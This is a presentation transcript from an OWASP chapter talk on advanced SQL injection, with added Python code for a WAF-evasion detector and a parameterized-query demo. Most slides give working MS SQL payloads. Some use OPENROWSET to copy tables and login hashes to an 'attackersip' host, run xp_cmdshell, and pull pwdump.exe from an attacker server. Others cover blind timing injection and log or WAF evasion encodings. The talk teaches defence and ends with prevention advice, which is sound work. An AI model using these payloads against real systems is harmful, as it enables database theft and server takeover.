Owasp Indy Q2 2012 Advanced SQLi
    Presentation Transcript

    • Advanced SQLi and Evasion Techniques
    • About Me
        Introduction
        Damian Profancik | Technical Lead/Security Services Leader @ Apparatus, CISSP
        dprofancik@gmail.com | @integrisec
    • Credit
        • Cesar Cerrudo – CTO, IOActive Labs
            o http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injection.pdf
        • ModSecurity Team – Trustwave SpiderLabs
            o http://blog.spiderlabs.com/2011/07/modsecurity-sql-injection-challenge-lessons-learned.html
        • Avi Douglen – OWASP Board Member, Israel
            o http://www.comsecglobal.com/framework/Upload/SQL_Smuggling.pdf
    • SQL Injection Basics
        • Dynamic construction of SQL queries
            "SELECT * FROM table WHERE user = '" + uname + "' AND pwd = '" + pword + "'"
        • Unsanitized user input
            uname = ' or 1=1--
            => SELECT * FROM table WHERE user = '' or 1=1-- AND pwd = ''
        • Excessive permission
            o Web services running as a privileged user with db_owner rights
            o Connecting to the database using sa, dbo, or sysadmin accounts
            o Lax file system permissions
    • Advanced SQLi Techniques
        • Blind SQL Injection
        • Data Exfiltration
        • Privilege Escalation
        • Command Execution
        • Uploading Files
        • Internal DB Server Exploration
        • Port Scanning
        • Firewall Evasion
        • Log Evasion
        • WAF Evasion
    • Blind SQL Injection
    • Blind SQL Injection
        • Differential Analysis
            Example:
            http://www.someforum.com/posts.php?id=2
                SELECT author, title, body FROM posts WHERE ID = 2
            http://www.someforum.com/posts.php?id=2 and 1=2
                SELECT author, title, body FROM posts WHERE ID = 2 and 1=2
            http://www.someforum.com/posts.php?id=2 and 1=1
                SELECT author, title, body FROM posts WHERE ID = 2 and 1=1
            The "and 1=1" page matches the original while the "and 1=2" page returns nothing, so the difference alone confirms the injection point without any error message.
    • Blind SQL Injection (cont.)
        • Database Management System Fingerprinting
            o System Functions
                • MS SQL Server = getdate()
                • MySQL = now()
                • Oracle = sysdate()
                • Example: http://www.someforum.com/posts.php?id=2 and getdate()=getdate()
            o String Concatenation
                • MS SQL Server = +
                • MySQL = +, CONCAT()
                • Oracle = ||, CONCAT()
                • Example: http://www.someforum.com/posts.php?id=2 and 'test'='te'+'st'
            o Query Chaining
                • MS SQL Server, MySQL = allow chaining with a semicolon
                • Oracle = does NOT allow chaining with a semicolon
                • Example: http://www.someforum.com/posts.php?id=2; commit --
    • Blind SQL Injection (cont.)
        • Timing Attacks
            o Adding delay
                • SQL Server = WAITFOR DELAY '0:0:10'
                • MySQL = BENCHMARK(10000000,ENCODE('MSG','by 10 seconds'))
                • PostgreSQL = pg_sleep(10)
                • Oracle = UNION with a query that returns a lot of rows
            o SELECT IF(condition, true, false)
                Example: …1 UNION SELECT IF(SUBSTRING(password,1,1) = CHAR(50),BENCHMARK(10000000,ENCODE('MSG','by 10 seconds')),null) FROM users WHERE userid = 1;
    • Attacking MS SQL Server
    • Linked and Remote Servers
        • OPENROWSET
            Example:
            SELECT * FROM OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM table')
        • OPENDATASOURCE
            Example:
            SELECT * FROM OPENDATASOURCE('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;').DatabaseName.dbo.TableName
    • Data Exfiltration
        • Remote server INSERT
            Example:
            INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM table1') SELECT * FROM table2
    • Data Exfiltration (cont.)
        INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM _sysdatabases') SELECT * FROM master.dbo.sysdatabases
        INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM _sysobjects') SELECT * FROM databasename.dbo.sysobjects
        INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM _syscolumns') SELECT * FROM databasename.dbo.syscolumns
    • Data Exfiltration (cont.)
        INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM table1') SELECT * FROM databasename..table1
        INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM table2') SELECT * FROM databasename..table2
        INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM _sysxlogins') SELECT * FROM databasename.dbo.sysxlogins
    • Privilege Escalation
        • Known vulnerabilities
            Example: SQL injection vulnerability in the RESTORE DATABASE command that can lead to privilege escalation
            Team SHATTER - 4/12/2012 - http://packetstormsecurity.org/files/111788/shatter-sqlserver.txt
        • Often not required
            o Connection strings using sa, dbo, sysadmin
            o Web service context
    • Command Execution
        Example:
        INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM temp_table') EXEC master.dbo.xp_cmdshell 'dir'
    • Uploading Files
        On attacker's server…
        1. CREATE TABLE AttackerTable (data text)
        2. BULK INSERT AttackerTable FROM 'pwdump.exe' WITH (codepage='RAW')
        On victim's server…
        3. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersIP -Usa -Ppwn3d'
        4. EXEC xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo', 'AttackersAlias', 'REG_SZ', 'DBMSSOCN,AttackersIP,80'
        5. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersAlias -Usa -Ppwn3d'
    • Uploading Files (cont.)
        INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM temp_table')
        EXEC xp_cmdshell "first script line" >> script.vbs
        …
        EXEC xp_cmdshell "second script line" >> script.vbs
        ...
        EXEC xp_cmdshell "last script line" >> script.vbs
        EXEC xp_cmdshell script.vbs  ==> execute script to download binary
    • Internal DB Server Exploration
        • Linked and Remote Servers
            1. INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM _sysservers') SELECT * FROM master.dbo.sysservers
            2. INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM _sysservers') SELECT * FROM linkedserver1.master.dbo.sysservers
            3. INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM _sysdatabases') SELECT * FROM linkedserver1.master.dbo.sysdatabases
            4. Rinse and repeat…
    • Port Scanning
        Example:
        SELECT * FROM OPENROWSET('SQLOLEDB', 'uid=sa;pwd=;Network=DBMSSOCN;Address=192.168.1.1,80;timeout=5', 'SELECT * FROM table')
    • Evasion Techniques
    • Firewall Evasion
        • Use port 80 for outbound
            Example:
            INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,80;', 'SELECT * FROM table1') SELECT * FROM table2
    • Log Evasion
        • Inject using POST parameters
        • Long HTTP requests
            o IIS truncates logged requests longer than 4097 characters
            o Sun-One Application Server truncates at 4092 characters
            Example: http://www.someforum.com/posts.php?param=<4097 x 'a'>&id=2 or 1=1--
    • WAF Evasion
        • Comments
            o # = single-line comment
            o -- = single-line comment
            o /* */ = inline, multi-line comment
            o /*! */ = MySQL-specific inline, multi-line comment
            Example: http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…
        • New line
            o %0D%0A = URL-encoded newline
            o %0B = URL-encoded vertical tab
            Example: http://www.someforum.com/posts.php?id=2 UNION%0D%0ASELECT * FROM…
    • WAF Evasion (cont.)
        • Character Encoding
            o Unicode (U+02BC = ʼ)
            o CHAR()
            o Hexadecimal
            o URL-encoding
            o Double Encoding
            Example: Double Encoding:
                URL    = http://www.someforum.com/posts.php?id=2 UN%252f%252a%252a%252fION SEL%252f%252a%252a%252fECT * FROM…
                WAF    = http://www.someforum.com/posts.php?id=2 UN%2f%2a%2a%2fION SEL%2f%2a%2a%2fECT * FROM…
                Result = http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…
    • WAF Evasion (cont.)
        • Concatenation
            o EXEC()
            o Split/Join
            o Special Characters (e.g. '*', '+', '%')
            Example: Split/Join:
                URL         = http://www.someforum.com/posts.php?id=SELECT name&id=password FROM users
                WAF         = id=SELECT name   id=password FROM users
                ASP/ASP.Net = id=SELECT name,password FROM users
            Special Characters:
                URL         = http://www.someforum.com/posts.php?id=SEL%ECT name,password FR%OM users
                WAF         = id=SEL%ECT name,password FR%OM users
                ASP/ASP.Net = id=SELECT name,password FROM users
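The three WAF Evasion slides all exploit a gap between what the filter matches and what the backend finally hands to the SQL engine. The detector below is an added example, not code from the talk: it normalizes a query string the way the slides describe the backend behaving (repeated URL-decoding for double encoding, dropping inline comments, treating %0D%0A/%0B as whitespace, joining repeated parameters with commas like ASP/ASP.NET) before matching, with constructed sample query strings modelled on the slide URLs.

```python
import re
from urllib.parse import parse_qs, unquote

# Patterns are matched only after normalization, so the evasions on the slides
# (inline comments, newlines, double encoding, split/join) no longer hide them.
SQL_PATTERN = re.compile(r"\b(union\s+select|select\s+.+\s+from|or\s+1=1)\b", re.I)

def normalize(value, max_rounds=3):
    """Undo the transformations the backend applies before the SQL engine sees input."""
    prev, rounds = None, 0
    while value != prev and rounds < max_rounds:  # repeated decoding defeats double encoding
        prev, value = value, unquote(value)
        rounds += 1
    value = re.sub(r"/\*!(.*?)\*/", r"\1", value, flags=re.S)  # MySQL /*! ... */ keeps its body
    value = re.sub(r"/\*.*?\*/", "", value, flags=re.S)        # plain /**/ comments vanish
    value = re.sub(r"[\r\n\x0b]+", " ", value)                 # %0D%0A and %0B act as whitespace
    return re.sub(r"\s+", " ", value).strip()

def normalized_params(query_string):
    """Rebuild each parameter as ASP/ASP.NET would: repeated names joined with commas."""
    params = parse_qs(query_string, keep_blank_values=True)
    return {name: normalize(",".join(values)) for name, values in params.items()}

def is_suspicious(query_string):
    return any(SQL_PATTERN.search(v) for v in normalized_params(query_string).values())

# Constructed query strings modelled on the slide examples (not captured traffic).
SAMPLES = {
    "inline_comment": "id=2%20UN/**/ION%20SEL/**/ECT%20*%20FROM%20users",
    "newline": "id=2%20UNION%0D%0ASELECT%20*%20FROM%20users",
    "double_encoded": "id=2%20UN%252f%252a%252a%252fION%20SEL%252f%252a%252a%252fECT%20*%20FROM%20users",
    "split_join": "id=SELECT%20name&id=password%20FROM%20users",
    "benign": "id=2&page=3",
}

def scan_samples():
    """Map each sample label to whether the normalized request matches SQL_PATTERN."""
    return {label: is_suspicious(qs) for label, qs in SAMPLES.items()}

if __name__ == "__main__":
    for label, hit in scan_samples().items():
        print(f"{label:15} {'SUSPICIOUS' if hit else 'ok'}")
```

The point is that the normalization step, not the keyword list, is what closes the gap: a filter that matches the raw request string sees UN%252f%252a%252a%252fION and nothing else.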
    • SQL Injection Prevention
    • SQLi Prevention
        • Sanitize User Input
            o Normalize Input
            o Whitelists
            o Built-in Functions
            o Regular Expressions
            o Trust NO data source (i.e. Cookies, Referer, User-Agent, etc.)
        • Prepared Statements/Parameterized Queries
        • Stored Procedures
        • Accounts with Least Privilege
        • Enable DisallowAdhocAccess registry setting for MS SQL Server
        • Perform Self Assessments
        • Use a Web Application Firewall
        • Filter Outbound Traffic at Firewall
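To tie the "SQL Injection Basics" slide to the "Prepared Statements/Parameterized Queries" item above, here is an added example (not code from the talk) that runs the slide's own "' or 1=1--" payload against both the dynamically built query and a parameterized one. It uses a constructed in-memory SQLite table named users in place of the slide's "table"; the behaviour is the same for any driver that binds parameters.

```python
import sqlite3

def make_db():
    # Constructed in-memory table standing in for the slide's "table" (not from the talk).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, pwd TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return conn

def login_vulnerable(conn, uname, pword):
    # Dynamic construction from the "SQL Injection Basics" slide: the input becomes part
    # of the statement text, so a quote plus a comment marker rewrites the WHERE clause.
    query = ("SELECT * FROM users WHERE user = '" + uname
             + "' AND pwd = '" + pword + "'")
    return conn.execute(query).fetchall()

def login_parameterized(conn, uname, pword):
    # Prepared statement from the "SQLi Prevention" slide: the statement shape is fixed
    # and the values are bound separately, so the same payload is only a literal string.
    query = "SELECT * FROM users WHERE user = ? AND pwd = ?"
    return conn.execute(query, (uname, pword)).fetchall()

def compare(payload="' or 1=1--"):
    """Return how many rows each login variant yields for the slide's payload."""
    conn = make_db()
    return {
        "vulnerable_with_payload": len(login_vulnerable(conn, payload, "")),
        "parameterized_with_payload": len(login_parameterized(conn, payload, "")),
        "parameterized_valid_login": len(login_parameterized(conn, "alice", "s3cret")),
    }

if __name__ == "__main__":
    for label, rows in compare().items():
        print(f"{label:28} rows returned: {rows}")
```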
    • Q&A